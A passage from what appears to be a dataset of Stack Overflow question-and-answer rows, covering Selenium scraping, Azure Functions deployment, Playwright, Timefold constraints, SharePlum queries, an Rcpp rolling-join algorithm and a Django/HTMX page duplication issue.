348, 534, 446, 534, 1176, 1158, 412, 989, 360, 2165, 971, 993, 240, 606, 1554, 216, 387, 749, 384, 467, 654, 685, 954, 608, 299, 2270, 1178, 460, 548, 753, 399, 310, 837, 709, 259, 456, 351, 299, 950, 759, 178, 1072, 824, 198, 354, 608, 484, 717, 154, 598, 300, 303, 252, 565, 526, 381, 520, 384, 339, 461, 353, 391, 438, 450, 474, 228, 477, 623, 1196, 269, 341, 559, 468, 492, 528, 254, 1341, 545, 1276, 483, 794, 990, 742, 258, 341, 521, 714, 1234, 437, 1169, 660, 409, 873, 317, 1230, 1029, 1243, 390, 463, 335, 405, 1166, 357, 495, 530, 732, 330, 1368, 330, 330, 1368, 331, 930, 903, 801, 901, 1443, 324, 1444, 1443, 905, 324, 927, 2911, 468, 295, 370, 744, 235, 453, 355, 809, 1494, 168, 480, 494, 1102, 374, 480, 262, 563, 1844, 893, 180, 445, 588, 662, 746, 1482, 1054, 4866, 1377, 560, 726, 292, 377, 315, 1836, 782, 357, 1171, 190, 648, 715, 582, 1386, 540, 336, 482, 607, 361, 542, 357, 276, 1278, 593, 1019, 548, 1390, 552, 465, 372, 1283, 1281, 895, 751, 301, 261, 771, 428, 1206, 441, 1546, 285, 479, 902, 459, 603, 1187, 855, 856, 1444, 903, 930, 334, 856, 334, 856, 334, 1369, 331, 1368, 928, 324, 903, 494, 355, 450, 747, 410, 659, 477, 657, 2609, 477, 991, 930, 944, 464, 645, 476, 347, 849, 327, 445, 729, 486, 198, 369, 232, 396, 480, 269, 426, 351, 249, 803, 475, 228, 266, 844, 393, 516, 779, 483, 374, 561, 368, 374, 203, 494, 1443, 334, 856, 494, 1045, 894, 593, 590, 1086, 504, 928, 265, 312, 465, 408, 493, 265, 1625, 968, 1234, 348, 459, 1098, 318, 621, 549, 785, 1218, 585, 438, 1476, 230, 688, 584, 812, 423, 525, 459, 324, 981, 509, 323, 530, 466, 553, 462, 285, 1275, 402, 756, 1586, 588, 1004, 1170, 555, 426, 288, 605, 699, 1493, 621, 1746, 1023, 502, 375, 1028, 855, 581, 327, 162, 200, 201, 399, 435, 482, 690, 1173, 409, 836, 1526, 1020, 1088, 330, 315, 480, 593, 522, 444, 210, 739, 1900, 778, 847, 711, 219, 300, 303, 1109, 1283, 461, 860, 834, 778, 944, 282, 523, 593, 833, 564, 595, 534, 530, 582, 315, 1236, 1307, 939, 496, 667, 378, 1205, 174, 1331, 443, 479, 648, 857, 1285, 1071, 372, 1116, 577, 646, 645, 759, 1137, 819, 1577, 201, 374, 314, 736, 463, 1179, 491, 588, 953, 528, 392, 1367, 747, 344, 1762, 1048, 1070, 563, 474, 374, 327, 621, 596, 536, 260, 452, 576, 1476, 675, 824, 603, 511, 2064, 405, 548, 388, 1227, 368, 504, 1002, 327, 1544, 728, 906, 880, 405, 477, 585, 1141, 544, 530, 704, 1583, 1006, 422, 657, 1140, 482, 879, 750, 408, 951, 870, 488, 850, 537, 561, 555, 444, 822, 662, 333, 1993, 420, 406, 674, 644, 1392, 1031, 616, 815, 1180, 677, 861, 855, 251, 213, 375, 890, 200, 162, 1195, 1035, 388, 1224, 3684, 1002, 2398, 311, 355, 1626, 674, 626, 663, 646, 528, 1217, 348, 2272, 966, 658, 981, 511, 1121, 760, 312, 566, 961, 1659, 374, 480, 782, 1190, 324, 1140, 1254, 1513, 414, 1015, 1151, 786, 1122, 1642, 316, 476, 393, 1264, 530, 757, 716, 1019, 447, 279, 576, 681, 661, 1827, 267, 852, 738, 992, 1106, 1284, 234, 859, 692, 738, 1263, 473, 1122, 590, 307, 444, 529, 1217, 435, 1910, 1234, 1122, 473, 216, 678\] plt.figure(figsize=(16, 8)) sns.histplot( data=df, x='len', bins=200, kde=True, color='purple', multiple='stack', edgecolor='none' ) mode_val = df['len'].mode()[0] mode_count = df['len'].value_counts()[mode_val] plt.text(mode_val, mode_count + 1, str(mode_val), color='white', ha='center', fontsize=10, fontweight='bold', bbox=dict(facecolor='indigo', alpha=0.8)) plt.xlabel('len') plt.ylabel('count') plt.title('Length Distribution with KDE') plt.grid(False) plt.tight_layout() plt.show() | 1 | 2 |
79,572,584 | 2025-4-14 | https://stackoverflow.com/questions/79572584/do-i-need-a-local-install-of-firefox-if-using-firefox-driver-in-selenium | I'm using Librewolf as my personal browser, in my script I'm using Firefox driver, do I need to install Firefox in my machine in order for the driver to work "better"? I have a Python + Selenium app to get URL data from a website, it has 35 pages, the script worked for the first 2 pages, on the third gave me en error (class attribute missing). Do I need to give it more wait time? The attribute I'm trying to get is FS03250425_BCN03A20 from <div class="costa-itinerary-tile FS03250425_BCN03A20" data-cc-cruise-id="FS03250425_BCN03A20"> Is there a better way to do it? And this is the code I'm using select_url_css = "data-cc-cruise-id" select_tile_css = "div.costa-itinerary-tile" element = WebDriverWait(driver, 10).until(EC.visibility_of_element_located((By.CSS_SELECTOR, select_tile_css))) elements = driver.find_elements(By.CSS_SELECTOR, select_tile_css) for element in elements: url_raw = element.get_attribute(select_url_css) | You have asked two questions. Am answering the second one, which is about scraping 35 pages. Your selenium script needs to navigate to individual page and scrape the data. In the code below, I have used a while loop to click on the Next Page and scrape the data until the last page is reached. NOTE: Keep in mind that selenium is not the fastest way to achieve this, as selenium imitates human action and manually scrapes page by page which takes time. Code: from selenium.webdriver.common.by import By from selenium.webdriver.support.ui import WebDriverWait from selenium.webdriver.support import expected_conditions as EC from selenium import webdriver import time options = webdriver.FirefoxOptions() # options.add_argument("--headless") # Run headless if you wish driver = webdriver.Firefox(options=options) driver.get("https://www.costacruises.eu/cruises.html?page=1#occupancy_EUR_anonymous=A&guestAges=30&guestBirthdates=1995-04-10&%7B!tag=destinationTag%7DdestinationIds=ME&%7B!tag=embarkTag%7DembarkPortCode=BCN,ALC,VLC") driver.maximize_window() wait = WebDriverWait(driver, 10) # Below try catch code is to handle the cookie consent pop-up. If you are not getting this pop-up, you can remove this code. try: wait.until(EC.element_to_be_clickable((By.XPATH, "//button[text()='Accept']"))).click() except Exception as e: print("Accept button not found or not clickable:", e) cruise_ids = [] while True: try: # Wait for cruise tiles on the current page elements = wait.until(EC.visibility_of_all_elements_located((By.CSS_SELECTOR, "div.costa-itinerary-tile"))) # Collect cruise IDs on current page for element in elements: cruise_id = element.get_attribute("data-cc-cruise-id") if cruise_id and cruise_id not in cruise_ids: cruise_ids.append(cruise_id) # Below code will locate and store the next button in a list. And then clicks it only if it's enabled. next_button = wait.until(EC.visibility_of_all_elements_located((By.XPATH, "//a[@aria-label='Next page']"))) # If the next button is disabled, break the loop if not next_button[0].is_enabled(): break next_button[0].click() # Wait for content to load time.sleep(2) except Exception as e: break print("Collected Cruise IDs:") print(cruise_ids) Output: Collected Cruise IDs: ['FS04250428_BCN04A28', 'FS03250425_BCN03A20', 'FS03261103_BCN03A2W', 'TO03260409_BCN03A3D', 'FS03261020_BCN03306', 'FS03261027_BCN03A2U', 'SM07250427_BCN07A1B', 'SM07250504_BCN07A1B', 'SM07260126_BCN07A4U', 'PA05260401_VLC05A05', 'SM07250525_BCN07A3O', 'SM07251109_BCN07A3P', 'DI03250926_BCN03A2G', 'SM08251214_BCN08A0I', 'PA07251027_BCN07A45', 'SM07251102_BCN07A3P', 'TO07260419_BCN07A3M', 'TO07261025_BCN07A3M', 'PA07260520_VLC07A31', 'PA07260527_VLC07A32', 'PA07251006_VLC07A2Y', 'SM07261102_BCN07A4Y', 'TO07261018_BCN07A3M', 'PA07260603_ALC07A01', 'SM07250914_BCN07A3P', 'SM07250601_BCN07A3O', 'SM07260427_BCN07A4W', 'SM07260518_BCN07A4V', 'SM07260525_BCN07A4V', 'TO07260920_BCN07A3M', 'PA07250602_VLC07A2S', 'TO07250909_BCN07A4O'] Process finished with exit code 0 | 1 | 1 |
79,569,153 | 2025-4-11 | https://stackoverflow.com/questions/79569153/module-not-found-azure-data-when-deploying-azure-function-works-locally | I am building a python function. When I run it locally, everything works as expected. When I try to deploy it (using GitHub Actions), the deployment is successful, but the function can not be started, because it throws an error. As you can see in the following picture, the build process works fine and I can run the function_app.py in the generated folder, when extracting the zip. However, when I look into the azure function logs, I see that the function has been started with 0 routes mapped. Here are the logs from the function startup: 4/11/2025, 2:42:50.361 PM Job host started 1 4/11/2025, 2:42:49.565 PM Initializing Warmup Extension. 1 4/11/2025, 2:42:49.571 PM Initializing Host. OperationId: '1393eee4-b797-4b1e-ba9f-7863e0b9f902'. 1 4/11/2025, 2:42:49.571 PM Host initialization: ConsecutiveErrors=0, StartupCount=3, OperationId=1393eee4-b797-4b1e-ba9f-7863e0b9f902 1 4/11/2025, 2:42:49.575 PM Traceback (most recent call last): 1 4/11/2025, 2:42:49.575 PM File "/azure-functions-host/workers/python/3.11/LINUX/X64/azure_functions_worker/utils/wrappers.py", line 44, in call 1 4/11/2025, 2:42:49.575 PM return func(*args, **kwargs) 1 4/11/2025, 2:42:49.575 PM ^^^^^^^^^^^^^^^^^^^^^ 1 4/11/2025, 2:42:49.575 PM File "/azure-functions-host/workers/python/3.11/LINUX/X64/azure_functions_worker/loader.py", line 244, in index_function_app 1 4/11/2025, 2:42:49.575 PM imported_module = importlib.import_module(module_name) 1 4/11/2025, 2:42:49.575 PM ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ 1 4/11/2025, 2:42:49.575 PM File "/usr/local/lib/python3.11/importlib/__init__.py", line 126, in import_module 1 4/11/2025, 2:42:49.575 PM return _bootstrap._gcd_import(name[level:], package, level) 1 4/11/2025, 2:42:49.575 PM ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ 1 4/11/2025, 2:42:49.575 PM File "<frozen importlib._bootstrap>", line 1204, in _gcd_import 1 4/11/2025, 2:42:49.575 PM File "<frozen importlib._bootstrap>", line 1176, in _find_and_load 1 4/11/2025, 2:42:49.575 PM File "<frozen importlib._bootstrap>", line 1147, in _find_and_load_unlocked 1 4/11/2025, 2:42:49.575 PM File "<frozen importlib._bootstrap>", line 690, in _load_unlocked 1 4/11/2025, 2:42:49.575 PM File "<frozen importlib._bootstrap_external>", line 940, in exec_module 1 4/11/2025, 2:42:49.575 PM File "<frozen importlib._bootstrap>", line 241, in _call_with_frames_removed 1 4/11/2025, 2:42:49.575 PM File "/home/site/wwwroot/function_app.py", line 4, in <module> 1 4/11/2025, 2:42:49.575 PM from azure.data.tables import TableClient, TableServiceClient 1 4/11/2025, 2:42:49.575 PM ModuleNotFoundError: No module named 'azure.data' 3 What's the problem here? The function does start up, but gets caught on line 4 of the function_app.py - here's the line in code: from azure.data.tables import TableClient, TableServiceClient Really appreciate any insights here PS: of course the dependency is listed in requirements.txt in case you were wondering - that's why it also runs anywhere else but when deployed. Edit: The workflow file is this: # Docs for the Azure Web Apps Deploy action: https://github.com/azure/functions-action # More GitHub Actions for Azure: https://github.com/Azure/actions # More info on Python, GitHub Actions, and Azure Functions: https://aka.ms/python-webapps-actions name: Deploy on: push: branches: - test workflow_dispatch: env: AZURE_FUNCTIONAPP_PACKAGE_PATH: './api' # set this to the path to your web app project, defaults to the repository root PYTHON_VERSION: '3.11' # set this to the python version to use (supports 3.6, 3.7, 3.8) AZURE_STORAGE_CONNECTION_STRING: ${{ secrets.AZURE_STORAGE_CONNECTION_STRING }} AZURE_COSMOS_CONNECTION_STRING: ${{ secrets.AZURE_COSMOS_CONNECTION_STRING }} jobs: build: runs-on: ubuntu-latest permissions: contents: read #This is required for actions/checkout steps: - name: Checkout repository uses: actions/checkout@v4 - name: Setup Python version uses: actions/setup-python@v5 with: python-version: ${{ env.PYTHON_VERSION }} - name: Copy /shared to /api run: cp -r ./shared ./api/ - name: Create and start virtual environment run: | python3 -m venv venv source venv/bin/activate - name: Install dependencies (api) run: pip3 install -r ./api/requirements.txt # Optional: Add step to run tests here - name: Test function app run: python3 ./api/function_app.py # end of tests - name: Zip artifact for deployment run: zip release.zip ./api/* -r - name: Upload artifact for deployment job uses: actions/upload-artifact@v4 with: name: python-app path: | release.zip deploy: runs-on: ubuntu-latest needs: build steps: - name: Download artifact from build job uses: actions/download-artifact@v4 with: name: python-app - name: Unzip artifact for deployment run: unzip release.zip - name: 'Deploy to Azure Functions' uses: Azure/functions-action@v1 id: deploy-to-function with: app-name: 'my_app' slot-name: 'Production' package: ${{ env.AZURE_FUNCTIONAPP_PACKAGE_PATH }} publish-profile: ${{ secrets.AZUREAPPSERVICE_PUBLISHPROFILE_XXXXXXXX }} sku: 'flexconsumption' | I got it to work on a FLEX Consumption plan. I deployed the exact same zip file (using azure cli) to two functions, one one FLEX and one on normal consumption plan. On the Consumption plan it still produces the original error, module not found, while on the flex plan it deploys successfully. must be a bug | 1 | 0 |
79,572,155 | 2025-4-13 | https://stackoverflow.com/questions/79572155/how-to-automatically-start-the-debugging-session-in-playwright | I want to automatically start the debugging session instead of having it starting as paused. I found out that adding this code makes it work but it feels hackish to me: context.add_init_script("setTimeout(window.__pw_resume, 500)") Without the setTimeout, it won't work. Am I doing anything wrong? | __pw_resume isn’t defined immediately, so a short delay is needed. As of now, there’s no official setting to start unpaused, so this workaround necessary. | 1 | 2 |
79,568,397 | 2025-4-11 | https://stackoverflow.com/questions/79568397/setting-a-predecessor-constraint-in-timefold-python | I am trying to implement a predecessor constraint similar to the Job Scheduling example given in java. But I struggle with the ordering constraint definition to consider predecessors. I have defined my time slots simply as ordered integers : @dataclass class Timeslot: slot : int And my operations as planning entities with few boolean operations and predecessors as a list of other operations id : @planning_entity @dataclass class Operation: id: Annotated[int, PlanningId] name: str predecessors: list[int] timeslot: Annotated[Timeslot, PlanningVariable] = field(default=None) def isPred(self,other): return other.id in self.predecessors def isAfter(self,other): return self.timeslot.slot < other.timeslot.slot And then my constraint as : def precondition_conflict(constraint_factory: ConstraintFactory) -> Constraint: # Respect order constraints return ( constraint_factory.for_each_unique_pair(Operation) .filter(lambda op1, op2 : op1.isPred(op2)) .filter(lambda op1, op2 : op1.isAfter(op2)) .penalize(HardSoftScore.ONE_HARD) .as_constraint("Order conflict") ) Then I instanciate my problem : operations.append(Operation(1,"OP N°1 : Bake the cake",[3])) operations.append(Operation(2,"OP N°2 : Enjoy your meal",[4])) operations.append(Operation(3,"OP N°3 : Mix flour, eggs and whatever they say in the recipe",[])) operations.append(Operation(4,"OP N°4 : take it out of the oven",[1])) But the solver keeps giving me solutions where the operations order is incorrect, with 0 hard constraint violated. For instance : INFO:timefold.solver:Solving ended: time spent (30056), best score (0hard/0soft), move evaluation speed (219895/sec), phase total (2), environment mode (PHASE_ASSERT), move thread count (NONE). INFO:app:+------------------+------------------+ INFO:app:|0 |OP N°4 : take it out of the oven| INFO:app:+------------------+------------------+ INFO:app:|1 |OP N°2 : Enjoy your meal| INFO:app:+------------------+------------------+ INFO:app:|2 |OP N°3 : Mix flour, eggs and whatever they say in the recipe| INFO:app:+------------------+------------------+ INFO:app:|3 |OP N°1 : Bake the cake| INFO:app:+------------------+------------------+ Where obviously I expected 3 -> 1 -> 4 -> 2 Where did I do it wrong? SOLUTION (thanks to Lukáš Petrovický): def precondition_conflict(constraint_factory: ConstraintFactory) -> Constraint: # Respect order constraints return ( constraint_factory.for_each(Operation) .join(Operation) .filter(lambda op1, op2 : op1.isPred(op2)) .filter(lambda op1, op2 : op1.isAfter(op2)) .penalize(HardSoftScore.ONE_HARD) .as_constraint("Order conflict") ) | Unique pairs are tricky. In this case, you probably want to avoid using them, and instead go for a standard join. Consider three operations: A, B, C. Unique pairs will give you A+B, A+C and B+C. It assumes that whatever is true for A+B, it is also true for B+A and therefore processing both would be redundant. But this is not true in your case. A standard join would fix it, enumerating all possible pairs. Or a better filter, which checks the condition from both sides. | 1 | 2 |
79,572,510 | 2025-4-14 | https://stackoverflow.com/questions/79572510/shareplum-queries-do-not-support-datetime-variables | Shareplum is unable to retrieve entries from a Sharepoint list using DateTime variables (for example, to find entries that were modified after a certain date). Code: from requests_negotiate_sspi import HttpNegotiateAuth from shareplum import Site import datetime site = Site("sharepoint.com", version=Version.v2016, auth=HttpNegotiateAuth()) date = datetime.datetime(2025, 4, 8, 0, 0, 0) query = {'Where' : [('Gt', 'Modified', date)]} sp_list = site.List('Sharepoint List') data = sp_list.GetListItems('All Items', query=query) If a datetime object is provided, the following error occurs: TypeError : Argument must be bytes or unicode, got 'datetime' If a string/integer is provided, the following error occurs instead: Failed to download list items Shareplum HTTP Post Failed : 500 Server Error As mentioned in these issues: https://github.com/jasonrollins/shareplum/issues/156 https://github.com/jasonrollins/shareplum/issues/186 | You can manually craft the CAML query XML, rather than using SharePlum’s dictionary-style shorthand. Here’s how to do it: from requests_negotiate_sspi import HttpNegotiateAuth from shareplum import Site from shareplum import Office365 from shareplum.site import Version import datetime # SharePoint credentials site_url = "https://yourcompany.sharepoint.com/sites/yoursite" list_name = "Your List Name" auth = HttpNegotiateAuth() site = Site(site_url, auth=auth, version=Version.v2016) sp_list = site.List(list_name) # Construct CAML query dt = datetime.datetime(2025, 4, 8, 0, 0, 0) date_string = dt.strftime('%Y-%m-%dT%H:%M:%SZ') # Format must be UTC ISO8601 caml_query = f""" <View> <Query> <Where> <Gt> <FieldRef Name='Modified' /> <Value Type='DateTime'>{date_string}</Value> </Gt> </Where> </Query> </View> """ # Retrieve items items = sp_list.GetListItems(view_name=None, query=caml_query) print(items) | 1 | 1 |
79,571,959 | 2025-4-13 | https://stackoverflow.com/questions/79571959/efficient-rolling-non-equi-joins | Looking for the current most efficient approach in either R, python or c++ (with Rcpp). Taking an example with financial data, df time bid ask time_msc flags wdayLab wday rowid <POSc> <num> <num> <POSc> <int> <ord> <num> <int> 1: 2025-01-02 04:00:00 21036.48 21043.08 2025-01-02 04:00:00.888 134 Thu 5 1 2: 2025-01-02 04:00:00 21037.54 21043.27 2025-01-02 04:00:00.888 134 Thu 5 2 3: 2025-01-02 04:00:00 21036.52 21042.55 2025-01-02 04:00:00.888 134 Thu 5 3 4: 2025-01-02 04:00:00 21036.82 21041.75 2025-01-02 04:00:00.888 134 Thu 5 4 5: 2025-01-02 04:00:00 21036.79 21040.78 2025-01-02 04:00:00.891 134 Thu 5 5 6: 2025-01-02 04:00:00 21035.86 21039.95 2025-01-02 04:00:00.891 134 Thu 5 6 7: 2025-01-02 04:00:00 21036.05 21038.76 2025-01-02 04:00:00.891 134 Thu 5 7 8: 2025-01-02 04:00:00 21034.74 21038.33 2025-01-02 04:00:00.891 134 Thu 5 8 9: 2025-01-02 04:00:00 21034.72 21039.35 2025-01-02 04:00:00.892 134 Thu 5 9 10: 2025-01-02 04:00:00 21034.99 21038.08 2025-01-02 04:00:00.892 134 Thu 5 10 I want, for each rowid, the most recent rowid in the past where the ask was higher. My real data has 29,871,567 rows (can share if needed). The solution doesn't need to be a join as long as the last higher rowid is retrieved. R data.table I usually solve this using R's data.table joins: library(data.table) setDTthreads(detectCores() - 2) # no effect df_joined <- df[,.(rowid, ask, time_msc)][,rowid_prevHi:=rowid][,ask_prevHi := ask][ df, on = .(rowid < rowid, ask >= ask), mult = "last", # Take the closest (most recent) match # by = .EACHI, # Do it row-by-row nomatch = NA, # Allow NA if no such row exists #.(i.rowid, last_higher_row = x.rowid, last_higher = x.time, lastHigh = x.ask) ][, difference_from_previous_higher := ask_prevHi - ask] This works on smaller datasets because both multiple inequalities and the rolling condition mult = "last" are supported. However, it is single-threaded and my rig doesn't manage the full dataset. Expected result is below, and I expect the difference_from_previous_higher to be always positive and the rowid_prevHi always smaller than rowid. rowid ask time_msc rowid_prevHi ask_prevHi time bid i.time_msc flags <int> <num> <POSc> <int> <num> <POSc> <num> <POSc> <int> 1: 1 21043.08 <NA> NA NA 2025-01-02 04:00:00 21036.48 2025-01-02 04:00:00.888 134 2: 2 21043.27 <NA> NA NA 2025-01-02 04:00:00 21037.54 2025-01-02 04:00:00.888 134 3: 3 21042.55 2025-01-02 04:00:00.888 2 21043.27 2025-01-02 04:00:00 21036.52 2025-01-02 04:00:00.888 134 4: 4 21041.75 2025-01-02 04:00:00.888 3 21042.55 2025-01-02 04:00:00 21036.82 2025-01-02 04:00:00.888 134 5: 5 21040.78 2025-01-02 04:00:00.888 4 21041.75 2025-01-02 04:00:00 21036.79 2025-01-02 04:00:00.891 134 6: 6 21039.95 2025-01-02 04:00:00.891 5 21040.78 2025-01-02 04:00:00 21035.86 2025-01-02 04:00:00.891 134 7: 7 21038.76 2025-01-02 04:00:00.891 6 21039.95 2025-01-02 04:00:00 21036.05 2025-01-02 04:00:00.891 134 8: 8 21038.33 2025-01-02 04:00:00.891 7 21038.76 2025-01-02 04:00:00 21034.74 2025-01-02 04:00:00.891 134 9: 9 21039.35 2025-01-02 04:00:00.891 6 21039.95 2025-01-02 04:00:00 21034.72 2025-01-02 04:00:00.892 134 10: 10 21038.08 2025-01-02 04:00:00.892 9 21039.35 2025-01-02 04:00:00 21034.99 2025-01-02 04:00:00.892 134 wdayLab wday difference_from_previous_higher <ord> <num> <num> 1: Thu 5 NA 2: Thu 5 NA 3: Thu 5 0.72 4: Thu 5 0.80 5: Thu 5 0.97 6: Thu 5 0.83 7: Thu 5 1.19 8: Thu 5 0.43 9: Thu 5 0.60 10: Thu 5 1.27 polars I've tried a polars implementation in python, but although join_asof is multiprocessed, fast and supports the backwards strategy it doesn't support specifying other inequalities while joining, only filtering after the join which is not useful. joined = df.join_asof( df.select(['rowid', 'time_msc', 'ask']).with_columns([ pl.col('time_msc').alias('time_prevhi') ]), on="time_msc", strategy="backward", suffix="_prevhi", allow_exact_matches=False ).with_columns([ (pl.col('rowid')-pl.col('rowid_prevhi')).alias('ticksdiff_prevhi'), (pl.col('ask')-pl.col('ask_prevhi')).alias('askdiff_prevhi'), ]) I'm not even sure how the matches are chosen, but of course ask is not always smaller than ask_prevHi since I couldn't mention it. shape: (10, 13) ┌─────┬─────┬─────┬───────┬────────┬──────┬───────┬────────┬───────┬───────┬───────┬───────┬───────┐ │ bid ┆ ask ┆ tim ┆ flags ┆ wdayLa ┆ wday ┆ rowid ┆ time ┆ rowid ┆ ask_p ┆ time_ ┆ ticks ┆ askdi │ │ --- ┆ --- ┆ e_m ┆ --- ┆ b ┆ --- ┆ --- ┆ --- ┆ _prev ┆ revhi ┆ prevh ┆ diff_ ┆ ff_pr │ │ f64 ┆ f64 ┆ sc ┆ i64 ┆ --- ┆ i64 ┆ i64 ┆ dateti ┆ hi ┆ --- ┆ i ┆ prevh ┆ evhi │ │ ┆ ┆ --- ┆ ┆ str ┆ ┆ ┆ me[μs] ┆ --- ┆ f64 ┆ --- ┆ i ┆ --- │ │ ┆ ┆ dat ┆ ┆ ┆ ┆ ┆ ┆ i64 ┆ ┆ datet ┆ --- ┆ f64 │ │ ┆ ┆ eti ┆ ┆ ┆ ┆ ┆ ┆ ┆ ┆ ime[m ┆ i64 ┆ │ │ ┆ ┆ me[ ┆ ┆ ┆ ┆ ┆ ┆ ┆ ┆ s] ┆ ┆ │ │ ┆ ┆ ms] ┆ ┆ ┆ ┆ ┆ ┆ ┆ ┆ ┆ ┆ │ ╞═════╪═════╪═════╪═══════╪════════╪══════╪═══════╪════════╪═══════╪═══════╪═══════╪═══════╪═══════╡ │ 210 ┆ 210 ┆ 202 ┆ 134 ┆ Thu ┆ 5 ┆ 1 ┆ 2025-0 ┆ null ┆ null ┆ null ┆ null ┆ null │ │ 36. ┆ 43. ┆ 5-0 ┆ ┆ ┆ ┆ ┆ 1-02 ┆ ┆ ┆ ┆ ┆ │ │ 48 ┆ 08 ┆ 1-0 ┆ ┆ ┆ ┆ ┆ 00:00: ┆ ┆ ┆ ┆ ┆ │ │ ┆ ┆ 2 ┆ ┆ ┆ ┆ ┆ 00 ┆ ┆ ┆ ┆ ┆ │ │ ┆ ┆ 00: ┆ ┆ ┆ ┆ ┆ ┆ ┆ ┆ ┆ ┆ │ │ ┆ ┆ 00: ┆ ┆ ┆ ┆ ┆ ┆ ┆ ┆ ┆ ┆ │ │ ┆ ┆ 00. ┆ ┆ ┆ ┆ ┆ ┆ ┆ ┆ ┆ ┆ │ │ ┆ ┆ 888 ┆ ┆ ┆ ┆ ┆ ┆ ┆ ┆ ┆ ┆ │ │ 210 ┆ 210 ┆ 202 ┆ 134 ┆ Thu ┆ 5 ┆ 2 ┆ 2025-0 ┆ 1 ┆ 21043 ┆ 2025- ┆ 1 ┆ 0.19 │ │ 37. ┆ 43. ┆ 5-0 ┆ ┆ ┆ ┆ ┆ 1-02 ┆ ┆ .08 ┆ 01-02 ┆ ┆ │ │ 54 ┆ 27 ┆ 1-0 ┆ ┆ ┆ ┆ ┆ 00:00: ┆ ┆ ┆ 00:00 ┆ ┆ │ │ ┆ ┆ 2 ┆ ┆ ┆ ┆ ┆ 00 ┆ ┆ ┆ :00.8 ┆ ┆ │ │ ┆ ┆ 00: ┆ ┆ ┆ ┆ ┆ ┆ ┆ ┆ 88 ┆ ┆ │ │ ┆ ┆ 00: ┆ ┆ ┆ ┆ ┆ ┆ ┆ ┆ ┆ ┆ │ │ ┆ ┆ 00. ┆ ┆ ┆ ┆ ┆ ┆ ┆ ┆ ┆ ┆ │ │ ┆ ┆ 889 ┆ ┆ ┆ ┆ ┆ ┆ ┆ ┆ ┆ ┆ │ │ 210 ┆ 210 ┆ 202 ┆ 134 ┆ Thu ┆ 5 ┆ 3 ┆ 2025-0 ┆ 1 ┆ 21043 ┆ 2025- ┆ 2 ┆ -0.53 │ │ 36. ┆ 42. ┆ 5-0 ┆ ┆ ┆ ┆ ┆ 1-02 ┆ ┆ .08 ┆ 01-02 ┆ ┆ │ │ 52 ┆ 55 ┆ 1-0 ┆ ┆ ┆ ┆ ┆ 00:00: ┆ ┆ ┆ 00:00 ┆ ┆ │ │ ┆ ┆ 2 ┆ ┆ ┆ ┆ ┆ 00 ┆ ┆ ┆ :00.8 ┆ ┆ │ │ ┆ ┆ 00: ┆ ┆ ┆ ┆ ┆ ┆ ┆ ┆ 88 ┆ ┆ │ I've also tried Polar's join_where which supports inequalities, but not a "nearest" constraint or strategy, and therefore explodes the number of lines quadratically, consuming all compute resources without a result. jw = df.join_where( df.select(['rowid', 'time_msc', 'ask']), pl.col("rowid") > pl.col("rowid_prevhi"), pl.col("ask") > pl.col("ask_prevhi"), suffix="_prevhi",) My next approach might be to loop over each row using an Rcpp function executed in parallel from R, which retrieves the rowid of the last previous higher ask. Or perhaps frollapply from data.table would do the trick? Suggestions most welcome. | Here is a RCCP stack-based approach of the Previous Greater Element problem with O(n) time complexity. It is also described here or here. IDK how fast you want this to be, maybe Java is faster. You could also use OpenMP parallel processing for the for-loop. For 1 million rows it runs with a median of 19.1ms Code d <- data.frame( rowid = 1:10e5, ask = sample(1:10e5) ) library(Rcpp) cppFunction(' List pge(NumericVector rowid, NumericVector ask) { int n = rowid.size(); NumericVector prevHigherRowid(n, NA_REAL); NumericVector prevHigherAsk(n, NA_REAL); NumericVector diff(n, NA_REAL); std::vector<int> stack; stack.reserve(n); for(int i = 0; i < n; i++) { double currentAsk = ask[i]; while(!stack.empty() && currentAsk >= ask[stack.back()]) { stack.pop_back(); } if(!stack.empty()) { prevHigherRowid[i] = rowid[stack.back()]; prevHigherAsk[i] = ask[stack.back()]; diff[i] = prevHigherAsk[i] - currentAsk; } stack.push_back(i); } return List::create( Named("rowid_prevHi") = prevHigherRowid, Named("ask_prevHi") = prevHigherAsk, Named("difference_from_previous_higher") = diff ); } ') pge_r <- function(d){ res<- pge(d$rowid, d$ask) d$rowid_prevHi <- res$rowid_prevHi d$ask_prevHi <- res$ask_prevHi d$difference_from_previous_higher <- res$difference_from_previous_higher d } bench::mark(pge_r(d)) | 1 | 4 |
79,572,062 | 2025-4-13 | https://stackoverflow.com/questions/79572062/django-duplication-of-html-on-page-load | I am using DJANGO to create a website, with minimal add ins. At this time, I have a page that duplicates itself on select change. Trying to change its' behavior only makes it worse, like if I change the swap to outer, then it duplicates outside of the element rather than in it. The environment: Windows 11 Pro x64 Visual Studio Code x64 python 3.12.3 Packages Versions ------------------------ --------- asgiref 3.8.1 certifi 2025.1.31 charset-normalizer 3.4.1 Django 5.2 django-htmx 1.23.0 django-multiselectfield 0.1.13 django-phonenumber-field 8.1.0 idna 3.10 phonenumberslite 9.0.3 pip 24.0 pyasn1 0.6.1 pyasn1_modules 0.4.2 python-ldap 3.4.4 The base html: {% load django_htmx %} <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8" /> <meta name="keywords" content="HTML, CSS, Python, JINJA"/> <meta name="viewport" content="width=device-width, initial-scale=1" /> {% htmx_script %} </head> <bod hx-headers='{"x-csrftoken": "{{ csrf_token }}"}'> <div id="navbar"> <nav class="navbar navbar-expand-lg navbar-dark bg-dark"> <span ><h1>{% block page_title %}base_title{% endblock page_title %}</h1></span> <button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbar"> <span class="navbar-toggler-icon"></span> </button> <div class="collapse navbar-collapse" id="navbar" > <div class="navbar-nav" style="margin-left: auto; margin-right: 0;"> <a class="nav-item nav-link" id="logout" href="/mytickets"> My Tickets </a> <a class="nav-item nav-link" id="logout" href="/createticket"> Create Ticket </a> <a class="nav-item nav-link" id="logout" href="/companytickets"> Company Tickets </a> <a class="nav-item nav-link" id="logout" href="/companyalerts"> Company Alerts </a> <a class="nav-item nav-link" id="logout" href="/logout"> Logout </a> <a class="nav-item nav-link" id="logout" href="/profile"> <svg xmlns="../static/css/person.svg" width="16" height="16" fill="black" class="bi bi-person" viewBox="0 0 16 16"> <path d="M8 8a3 3 0 1 0 0-6 3 3 0 0 0 0 6m2-3a2 2 0 1 1-4 0 2 2 0 0 1 4 0m4 8c0 1-1 1-1 1H3s-1 0-1-1 1-4 6-4 6 3 6 4m-1-.004c-.001-.246-.154-.986-.832-1.664C11.516 10.68 10.289 10 8 